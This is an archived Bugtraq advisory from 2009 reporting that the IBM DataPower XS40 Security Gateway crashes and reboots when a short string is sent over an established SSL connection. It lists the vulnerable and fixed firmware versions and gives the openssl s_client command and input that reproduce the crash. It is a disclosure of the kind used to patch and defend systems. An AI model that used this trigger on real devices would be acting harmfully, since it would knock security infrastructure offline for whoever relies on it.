Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

[IBM Datapower XS40] Denial of Service
From: erik () psafe nl
Date: Thu, 8 Jan 2009 03:14:51 -0700
It appears it is possible to crash the IBM DataPower XS40 Security Gateway device by sending a simple (random?) string 
to it, over an established SSL-connection. The device reboots as a response to the input.

Tested vulnerable firmware is 3.6.1.5
Issue fixed as tested in 3.6.1.12

Tested as follows (entered attack-string is ´abc´ in this case):
openssl s_client -connect [IP]:[port]
Loading 'screen' into random state - done
CONNECTED(0000078C)
..
---
abc [enter][enter]

read:errno=0

After this, the device crashes and reboots

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]